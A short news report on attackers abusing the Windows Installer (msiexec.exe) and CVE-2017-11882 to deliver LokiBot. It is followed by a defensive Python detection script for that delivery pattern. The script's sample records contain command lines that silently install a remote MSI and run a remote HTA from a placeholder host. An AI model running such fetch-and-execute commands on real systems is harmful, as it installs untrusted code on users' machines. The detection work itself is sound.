Attack abuses Windows Installer service to deliver LokiBot

Trend Micro researchers discovered attackers are exploiting a previously patched Windows vulnerability (CVE-2017-11882) by abusing the Windows Installer service, msiexec.exe, to deliver LokiBot malware.

According to the report, this is an uncommon method of installing malware. Previous attacks mainly used the Windows executable mshta.exe to run a PowerShell script that downloaded and executed the malware.

Palo Alto Networks published an analysis of in-the-wild exploitation of CVE-2017-11882 back in December.

Trend Micro believes attackers are using msiexec.exe to download a malicious MSI package in order to evade security software, which has historically focused on detecting traditional malware installation methods.

As is usually the case, victims can avoid infection by following anti-phishing best practices.

Enterprises can also mitigate the threat by disabling Windows Installer or restricting it from installing untrusted software, allowing only programs authorized by the company’s system administrator.
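A detection check a defender could run over process-creation telemetry for the delivery pattern the report describes (msiexec.exe fetching a remote MSI package, plus the older mshta.exe chain). This is an added example, not code from the Trend Micro report; the event records, hostnames and field names are constructed assumptions.

```python
import re
from typing import Dict, List

# Constructed process-creation records (field names assumed; not real telemetry).
SAMPLE_EVENTS: List[Dict] = [
    {"pid": 4120, "image": r"C:\Windows\System32\msiexec.exe",
     "cmdline": r"msiexec.exe /i http://example.invalid/update.msi /q"},
    {"pid": 4121, "image": r"C:\Windows\System32\msiexec.exe",
     "cmdline": r'msiexec.exe /i "C:\Users\alice\Downloads\tool.msi"'},
    {"pid": 4122, "image": r"C:\Windows\System32\msiexec.exe",
     "cmdline": r"MSIEXEC /PACKAGE https://example.invalid/a.msi /qn /norestart"},
    {"pid": 4123, "image": r"C:\Windows\System32\mshta.exe",
     "cmdline": r"mshta.exe http://example.invalid/x.hta"},
]

# A remote package location on the command line (msiexec accepts URLs for /i and /package).
URL_RE = re.compile(r"(?i)\b(?:https?|ftp)://\S+")
# msiexec install switches, with either / or - prefix.
INSTALL_RE = re.compile(r"(?i)(?:^|\s)[/-](?:i|package)(?=\s|$)")
# Quiet/no-UI flags (/q, /qn, /qb ...) that hide the install from the user.
QUIET_RE = re.compile(r"(?i)(?:^|\s)[/-]q[nbrf]?[+!-]?(?=\s|$)")


def classify(event: Dict) -> List[str]:
    """Return the reasons an event matches the delivery pattern; empty list if none."""
    image = event["image"].lower()
    cmd = event["cmdline"]
    reasons = []
    if image.endswith("\\msiexec.exe") and INSTALL_RE.search(cmd) and URL_RE.search(cmd):
        reasons.append("msiexec install switch with remote package URL")
        if QUIET_RE.search(cmd):
            reasons.append("quiet/no-UI install flag")
    elif image.endswith("\\mshta.exe") and URL_RE.search(cmd):
        reasons.append("mshta.exe launched with remote URL (older delivery chain)")
    return reasons


def scan(events: List[Dict]) -> Dict[int, List[str]]:
    """Map pid -> reasons for every event that matches at least one rule."""
    hits = {}
    for event in events:
        reasons = classify(event)
        if reasons:
            hits[event["pid"]] = reasons
    return hits


if __name__ == "__main__":
    for pid, reasons in scan(SAMPLE_EVENTS).items():
        print(pid, "; ".join(reasons))
```

A local MSI installed from disk (pid 4121 above) produces no hit, so the rule keys on the remote-fetch behaviour rather than on msiexec.exe itself.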
